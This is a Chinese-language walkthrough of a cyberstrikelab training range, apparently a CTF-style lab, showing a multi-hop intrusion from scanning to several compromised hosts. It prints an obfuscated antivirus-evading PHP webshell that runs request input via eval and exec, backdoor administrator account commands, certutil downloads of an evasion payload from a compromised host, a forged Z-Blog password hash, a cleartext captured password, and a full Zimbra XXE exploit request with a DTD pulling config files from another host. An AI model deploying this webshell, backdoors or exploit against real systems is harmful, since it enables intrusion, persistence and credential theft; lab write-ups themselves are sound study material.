cyberstrikelab-Thunder

信息收集

./fscan_mac_arm64 -h 172.20.56.10/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.20.56.32    is alive
(icmp) Target 172.20.56.233   is alive
[*] Icmp alive hosts len is: 2
172.20.56.32:3306 open
172.20.56.32:445 open
172.20.56.32:139 open
172.20.56.32:80 open
172.20.56.233:8080 open
172.20.56.233:22 open
172.20.56.32:135 open
[*] alive ports len is: 7
start vulscan
[*] NetInfo 
[*]172.20.56.32
   [->]WIN-BCQDCARVJPJ
   [->]172.20.56.32
   [->]172.20.57.30
[*] WebTitle https://172.20.56.233:8080 code:404 len:19     title:None
[*] WebTitle http://172.20.56.32       code:200 len:931    title:None
[+] PocScan http://172.20.56.32 poc-yaml-thinkphp5-controller-rce 
已完成 6/7 [-] ssh 172.20.56.233:22 root 12345678 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 
已完成 6/7 [-] ssh 172.20.56.233:22 root a123456 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 
已完成 6/7 [-] ssh 172.20.56.233:22 admin 123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 
已完成 6/7 [-] ssh 172.20.56.233:22 admin 666666 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 
已完成 6/7 [-] ssh 172.20.56.233:22 admin Aa123456! ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 
已完成 7/7
[*]扫描结束,耗时: 5m42.5521965s

扫描出来一个thinkphp的漏洞。

thinkphp rce

拿到第一个flag

原本想直接写一个shell

System Idle Process              0 Services                   0          4 K
System                           4 Services                   0        140 K
smss.exe                       296 Services                   0      1,200 K
csrss.exe                      388 Services                   0      4,412 K
wininit.exe                    456 Services                   0      5,124 K
csrss.exe                      464 Console                    1      8,276 K
winlogon.exe                   508 Console                    1     10,416 K
services.exe                   572 Services                   0      8,936 K
lsass.exe                      580 Services                   0     13,008 K
svchost.exe                    656 Services                   0     19,224 K
svchost.exe                    692 Services                   0      8,720 K
dwm.exe                        788 Console                    1     38,232 K
svchost.exe                    840 Services                   0     45,240 K
svchost.exe                    860 Services                   0     20,984 K
svchost.exe                    888 Services                   0     23,564 K
svchost.exe                    916 Services                   0     15,940 K
svchost.exe                     96 Services                   0     17,488 K
svchost.exe                    712 Services                   0      7,004 K
svchost.exe                    740 Services                   0     17,604 K
360rps.exe                     356 Services                   0      6,764 K
ZhuDongFangYu.exe             1028 Services                   0     27,064 K
svchost.exe                   1384 Services                   0     16,716 K
svchost.exe                   1528 Services                   0      6,508 K
spoolsv.exe                   1616 Services                   0     16,252 K
svchost.exe                   1768 Services                   0     22,396 K
httpd.exe                     1812 Services                   0     15,276 K
MsMpEng.exe                   1820 Services                   0    185,872 K
svchost.exe                   1924 Services                   0      7,880 K
mysqld.exe                    1972 Services                   0     24,052 K
httpd.exe                     2504 Services                   0     31,988 K
ChsIME.exe                    2556 Console                    1     15,660 K
RuntimeBroker.exe             3420 Console                    1     14,664 K
sihost.exe                    3500 Console                    1     18,808 K
svchost.exe                   3512 Console                    1     20,368 K
taskhostw.exe                 3528 Console                    1     15,496 K
ChsIME.exe                    3720 Console                    1     15,784 K
explorer.exe                  3824 Console                    1     71,808 K
ShellExperienceHost.exe       2200 Console                    1     45,532 K
SearchUI.exe                  2948 Console                    1     44,312 K
ServerManager.exe             4456 Console                    1     70,136 K
360sd.exe                     4840 Console                    1      1,932 K
360rp.exe                     4964 Console                    1     44,636 K
360Tray.exe                   5020 Console                    1     63,472 K
360speedld.exe                4684 Console                    1     42,084 K
svchost.exe                   3600 Services                   0      7,128 K
WmiPrvSE.exe                  2028 Services                   0      7,812 K
MpCmdRun.exe                   708 Services                   0      2,200 K
conhost.exe                   1356 Services                   0      1,392 K
MpCmdRun.exe                  1956 Services                   0     11,016 K
cmd.exe                       5320 Services                   0      3,636 K
conhost.exe                   4516 Services                   0      9,428 K
tasklist.exe                  2708 Services                   0      7,764 K
WmiPrvSE.exe                  4564 Services                   0      8,884 K
WmiPrvSE.exe                  4564 Services                   0      8,884 K

发现有360杀软，所以得写一个免杀的webshell，参考其他师傅的webshell

<?php
// 定义混淆函数m
function m($a, $b, $c) {
    return str_replace(str_split($a), str_split($b), $c);
}

// 定义字符串数组S，用来存储需要混淆的函数名
$S = array(
    m("ncoai", "msyte", "cocain"), 
    m("sir", "cex", "iris"),
    m("otab", "lshe", "taboo") . "_" . m("sir", "cex", "iris"),
    m("gbledin", "upasthr", "bleeding")
);

// 获取系统参数D
$TR = m("etroubl", "edisabl", "trouble");
$MK = m("dpreambl", "sfunctio", "preambled");
$D = explode(",", ini_get($TR . '_' . $MK));

// 获取请求参数P
$P = $_REQUEST;

foreach ($S as $A) {
    // 如果数组S中的某个元素不在数组D中
    if (!in_array($A, $D)) {
        // 根据不同的条件，执行对应的操作
        if ($A == m("ncoai", "msyte", "cocain")) {
            // 调用传递的命令
            if (isset($P['lol'])) {
                eval($P['lol']); // 执行传入的PHP代码
            }
        } elseif ($A == m("sir", "cex", "iris")) {
            // 执行命令并输出结果
            exec($P['lol'] . " 2>&1", $arr);
            echo join("\n", $arr) . "\n";
        } else {
            // 默认处理
            if (isset($P['lol'])) {
                eval($P['lol']);
            }
        }
        // 执行完毕后退出
        exit;
    }
}
?>

把shell弹到cs上提权看看,因为存在360所以需要对cs进行免杀所以去找了个项目
https://github.com/T4y1oR/RingQ

土豆提权

成功提权

权限维持

先给自己添加一个后门用户rdp上去把360给关了。

shell net user ocean admin@123 /add
shell net localgroup administrators ocean /add

然后利用插件把rdp服务开起来

直接给他关了，然后去抓个密码

Administrator / Tp@cslKM

内网渗透

两个网卡去搜集下信息，直接fscan大法干他

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.20.57.30    is alive
(icmp) Target 172.20.57.98    is alive
[*] Icmp alive hosts len is: 2
172.20.57.30:445 open
172.20.57.98:3306 open
172.20.57.30:3306 open
172.20.57.98:445 open
172.20.57.98:139 open
172.20.57.30:139 open
172.20.57.98:135 open
172.20.57.30:135 open
172.20.57.30:80 open
[*] alive ports len is: 9
start vulscan
[*] NetInfo 
[*]172.20.57.30
   [->]WIN-BCQDCARVJPJ
   [->]172.20.56.32
   [->]172.20.57.30
[*] NetInfo 
[*]172.20.57.98
   [->]WIN-J2B9EIUKEN3
   [->]172.20.57.98
   [->]10.0.0.65
[*] NetBios 172.20.57.98    WORKGROUP\WIN-J2B9EIUKEN3           Windows Server 2016 Standard 14393
[*] WebTitle http://172.20.57.30       code:200 len:931    title:None

[03/27 16:39:36] [+] received output:
[+] PocScan http://172.20.57.30 poc-yaml-thinkphp5-controller-rce 

发现一个新的ip10.0.0.65 还有一个 172.20.57.98,继续扫描172.20.57.98全端口看看有什么服务，但是毛线都没有，跟第一次扫描一样没啥web服务，那就转头去看看数据库。这里我参考了前面的师傅说之前有提示密码 CSLab 作为账号密码

记得爆破的时候挂上代理，使用mdut连接一波

横向 172.20.57.98

提个权使用udf,还有denfender操，那就换成弹shell趁他没杀先给我执行cs弹过去,这里我是将免杀的木马放到thinkphp服务的public的目录下了好通过http下载

certutil -urlcache -split -f http://172.20.57.30/RingQ.exe
certutil -urlcache -split -f http://172.20.57.30/main.txt

已经上传成功，接下来执行一波

成功转发上线,还是用土豆提权试试

成功，继续做个权限维持rdp上去给他把defender关了

shell net user ocean admin@123 /add
shell net localgroup administrators ocean /add

继续fscan大法扫描内网

 / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
(icmp) Target 10.0.0.34       is alive
(icmp) Target 10.0.0.65       is alive
[*] Icmp alive hosts len is: 2
10.0.0.34:80 open
10.0.0.34:22 open
10.0.0.65:3306 open
10.0.0.65:445 open
10.0.0.65:139 open
10.0.0.65:135 open
[*] alive ports len is: 6
start vulscan
[*] NetInfo
[*]10.0.0.65
   [->]WIN-J2B9EIUKEN3
   [->]172.20.57.98
   [->]10.0.0.65

有一个web服务搭上代理去看看。发现是zblog需要审计源码，这里我直接参考其他的师傅的思路打的。

横向 10.0.0.34

在我们拿下的那台数据库主机上看到了guid

在源码中发现了密码的生成算法。

所以咱们直接自己生成一波

ps = 123456  
guid = 24d876c8772572cf839674c5a176e41c  
Password = md5(md5(123456) + 24d876c8772572cf839674c5a176e41c)  
Password = 30492f76a0fbcf3906cce8b4b566d6b6

顺利进入后台，然后后台存在一个文件上传
参考 https://github.com/fengyijiu520/Z-Blog-

然后直接用蚁剑连接即可。发现是linux系统需要提权，直接来一首sudo -l

那么去改一下这个sh文件在执行就行了

继续看看ip

发现还有一层难崩，那就继续扫扫内网吧,同时把代理也搭建起来。

10.1.1.56:11211 open
10.1.1.56:443 open
10.1.1.78:80 open
10.1.1.78:22 open
10.1.1.56:22 open
10.1.1.56:7071 open
10.1.1.56:8443 open
[+] Memcached 10.1.1.56:11211 unauthorized
[*] WebTitle http://10.1.1.78          code:200 len:7205   title:Good Luck To You! - cyberstrikelab

发现服务去看看

有一个zimbra服务去找找漏洞

横向 10.1.1.56

有一个cve-2019-9670-xxe

参考： http://nooemotion.com/2023/02/16/zimbra%E6%94%BB%E9%98%B2%E7%AC%94%E8%AE%B0-xxessrf-rce/

先来写一个dtd,这个是读账号密码的，可以直接改成直接读flag

<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">  
<!ENTITY % start "<![CDATA[">  
<!ENTITY % end "]]>">  
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">

记得在php那台服务器创建
然后直接打

POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: 10.1.1.56:8443
Cookie: ZM_TEST=true
Content-Length: 399
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Origin: https://10.1.1.56
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://10.1.1.56/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: keep-alive

<!DOCTYPE Autodiscover [
        <!ENTITY % dtd SYSTEM "http://10.1.1.78/test.dtd">
        %dtd;
        %all;
        ]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Request>
        <EMailAddress>aaaaa</EMailAddress>
        <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
    </Request>
</Autodiscover>